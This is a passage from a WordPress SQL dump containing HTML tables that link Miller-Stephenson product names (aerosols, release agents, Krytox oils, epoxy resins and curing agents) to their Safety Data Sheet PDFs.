href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf">PFPE Oils</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/3100MD-3170MD-16.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/114D-17.pdf">MS-114D </a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'publish', 'closed', 'closed', '', 'sds', '', '', '2017-06-16 17:39:23', '2017-06-16 17:39:23', '', 122, 'https://132.148.10.86/wordpress/?page_id=1842', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (1843, 2, '2016-09-20 13:40:27', '2016-09-20 13:40:27', '<h1>Miller-Stephenson SDS data base.</h1>\r\nif you are unable yo locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="870" bgcolor="#000000">\r\n<tbody>\r\n<tr>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="125">\r\n<h5>AEROSOL</h5>\r\n</th>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="125">\r\n<h5>LIQUID</h5>\r\n</th>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="125">\r\n<h5>RELEASE AGENTS</h5>\r\n</th>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="125">\r\n<h5>CONFORMAL COATING</h5>\r\n</th>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="210">\r\n<h5>KRYTOX™</h5>\r\n</th>\r\n<th scope="col" align="center" valign="middle" bgcolor="#000000" width="125">\r\n<h5>EPOXY</h5>\r\n</th>\r\n</tr>\r\n<tr>\r\n<td align="center" valign="middle" bgcolor="#000000"></td>\r\n<td align="center" valign="middle" bgcolor="#000000"></td>\r\n<td align="center" valign="middle" bgcolor="#000000"></td>\r\n<td align="center" valign="middle" bgcolor="#000000"></td>\r\n<td align="center" valign="middle" bgcolor="#000000" width="210"></td>\r\n<td align="center" valign="middle" bgcolor="#000000"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" bgcolor="#000000">\r\n<ul>\r\n 	<li><a class="blanco2">MS-124H</a></li>\r\n 	<li><a class="blanco2">MS-222L</a></li>\r\n 	<li><a class="blanco2">MS-222N</a></li>\r\n 	<li><a class="blanco2">MS-222T</a></li>\r\n 	<li><a class="blanco2">MS-222F</a></li>\r\n 	<li><a class="blanco2">MS-242L</a></li>\r\n 	<li><a class="blanco2">MS-242L-AS</a></li>\r\n 	<li><a class="blanco2">MS-242N</a></li>\r\n 	<li><a class="blanco2">MS-242N-AS</a></li>\r\n 	<li><a class="blanco2">MS-381H</a></li>\r\n 	<li><a class="blanco2">MS-381HM</a></li>\r\n 	<li><a class="blanco2">MS-381HUV</a></li>\r\n 	<li><a class="blanco2">MS-381HMUV</a></li>\r\n 	<li><a class="blanco2">MS-381HC</a></li>\r\n 	<li><a class="blanco2">MS-381HCM</a></li>\r\n 	<li><a class="blanco2">MS-381HCUV</a></li>\r\n 	<li><a class="blanco2">MS-381HCMUV</a></li>\r\n 	<li><a class="blanco2">MS-250</a></li>\r\n 	<li><a class="blanco2">MS-250M</a></li>\r\n 	<li><a class="blanco2">MS-250SP</a></li>\r\n 	<li><a class="blanco2">MS-255</a></li>\r\n 	<li><a class="blanco2">MS-255M</a></li>\r\n 	<li><a class="blanco2">MS-260</a></li>\r\n 	<li><a class="blanco2">MS-260M</a></li>\r\n 	<li><a class="blanco2">MS-280</a></li>\r\n 	<li><a class="blanco2">MS-530</a></li>\r\n 	<li><a class="blanco2">MS-538</a></li>\r\n 	<li><a class="blanco2">MS-550</a></li>\r\n 	<li><a class="blanco2">MS-555</a></li>\r\n 	<li><a class="blanco2">MS-560</a></li>\r\n 	<li><a class="blanco2">MS-580</a></li>\r\n 	<li><a class="blanco2">MS-700</a></li>\r\n 	<li><a class="blanco2">MS-700M</a></li>\r\n 	<li><a class="blanco2">MS-720</a></li>\r\n 	<li><a class="blanco2">MS-720M</a></li>\r\n 	<li><a class="blanco2">MS-720L</a></li>\r\n 	<li><a class="blanco2">MS-725</a></li>\r\n 	<li><a class="blanco2">MS-725M</a></li>\r\n 	<li><a class="blanco2">MS-730</a></li>\r\n 	<li><a class="blanco2">MS-730M</a></li>\r\n 	<li><a class="blanco2">MS-730L</a></li>\r\n 	<li><a class="blanco2">MS-738</a></li>\r\n 	<li><a class="blanco2">MS-738M</a></li>\r\n 	<li><a class="blanco">MS-745</a></li>\r\n 	<li><a class="blanco2">MS-750</a></li>\r\n 	<li><a class="blanco2">MS-750M</a></li>\r\n 	<li><a class="blanco2">MS-755</a></li>\r\n 	<li><a class="blanco2">MS-755M</a></li>\r\n 	<li><a class="blanco2">MS-755L</a></li>\r\n 	<li><a class="blanco2">MS-760</a></li>\r\n 	<li><a class="blanco2">MS-760M</a></li>\r\n 	<li><a class="blanco2">MS-765</a></li>\r\n 	<li><a class="blanco2">MS-770</a></li>\r\n 	<li><a class="blanco2">MS-770M</a></li>\r\n 	<li><a class="blanco2">MS-775</a></li>\r\n 	<li><a class="blanco2">MS-775M</a></li>\r\n 	<li><a class="blanco2">MS-780</a></li>\r\n 	<li><a class="blanco2">MS-780M</a></li>\r\n 	<li><a class="blanco2">MS-795</a></li>\r\n 	<li><a class="blanco2">MS-795M</a></li>\r\n 	<li><a class="blanco2">MS-110X</a></li>\r\n 	<li><a class="blanco2">MS-120X</a></li>\r\n 	<li><a class="blanco2">MS-120X-XP</a></li>\r\n 	<li><a class="blanco2">H0805A</a></li>\r\n 	<li><a class="blanco2">J0912A</a></li>\r\n 	<li><a class="blanco2">K0725A</a></li>\r\n 	<li><a class="blanco2">K1016A</a></li>\r\n</ul>\r\n</td>\r\n<td valign="top" bgcolor="#000000">\r\n<ul>\r\n 	<li><a class="blanco2">MS-111</a></li>\r\n 	<li><a class="blanco2">MS-114C</a></li>\r\n 	<li><a class="blanco2">MS-115</a></li>\r\n 	<li><a class="blanco2">MS-182SD</a></li>\r\n 	<li><a class="blanco2">MS-126H</a></li>\r\n 	<li><a class="blanco2">MS-126HUV</a></li>\r\n 	<li><a class="blanco2">MS-383A</a></li>\r\n 	<li><a class="blanco2">MS-383H</a></li>\r\n 	<li><a class="blanco2">MS-383HUV</a></li>\r\n 	<li><a class="blanco2">MS-252</a></li>\r\n 	<li><a class="blanco2">MS-257</a></li>\r\n 	<li><a class="blanco2">MS-262</a></li>\r\n 	<li><a class="blanco2">MS-282</a></li>\r\n 	<li><a class="blanco2">MS-532</a></li>\r\n 	<li><a class="blanco2">MS-539</a></li>\r\n 	<li><a class="blanco2">MS-552</a></li>\r\n 	<li><a class="blanco2">MS-557</a></li>\r\n 	<li><a class="blanco2">MS-562</a></li>\r\n 	<li><a class="blanco2">MS-582</a></li>\r\n 	<li><a class="blanco2">MS-702</a></li>\r\n 	<li><a class="blanco2">MS-722</a></li>\r\n 	<li><a class="blanco2">MS-727</a></li>\r\n 	<li><a class="blanco2">MS-732</a></li>\r\n 	<li><a class="blanco2">MS-739</a></li>\r\n 	<li><a class="blanco2">MS-747</a></li>\r\n 	<li><a class="blanco2">MS-752</a></li>\r\n 	<li><a class="blanco2">MS-752U</a></li>\r\n 	<li><a class="blanco2">MS-757</a></li>\r\n 	<li><a class="blanco2">MS-762</a></li>\r\n 	<li><a class="blanco2">MS-767</a></li>\r\n 	<li><a class="blanco2">MS-772</a></li>\r\n 	<li><a class="blanco2">MS-777</a></li>\r\n 	<li><a class="blanco2">MS-782</a></li>\r\n 	<li><a class="blanco2">MS-787</a></li>\r\n 	<li><a class="blanco2">MS-797</a></li>\r\n 	<li><a class="blanco2">MS-110XB</a></li>\r\n 	<li><a class="blanco2">MS-1010</a></li>\r\n 	<li><a class="blanco2">MS-2010</a></li>\r\n 	<li><a class="blanco2">MS-31XXMD</a></li>\r\n 	<li><a class="blanco2">MS-32XXMD</a></li>\r\n 	<li><a class="blanco2">X-P35</a></li>\r\n 	<li><a class="blanco2">H0805B</a></li>\r\n 	<li><a class="blanco2">H1112B</a></li>\r\n 	<li><a class="blanco2">Vertrel SDG</a></li>\r\n 	<li><a class="blanco2">Vertrel SFR</a></li>\r\n</ul>\r\n</td>\r\n<td valign="top" bgcolor="#000000">\r\n<ul>\r\n 	<li><a class="blanco2">MS-122AD</a></li>\r\n 	<li><a class="blanco2">MS-122AD RED</a></li>\r\n 	<li><a class="blanco2">MS-122ADL</a></li>\r\n 	<li><a class="blanco2">MS-122AV</a></li>\r\n 	<li><a class="blanco2">MS-122E</a></li>\r\n 	<li><a class="blanco2">MS-122E RED</a></li>\r\n 	<li><a class="blanco2">MS-122SE</a></li>\r\n 	<li><a class="blanco2">MS-122SD</a></li>\r\n 	<li><a class="blanco2">MS-122XD</a></li>\r\n 	<li><a 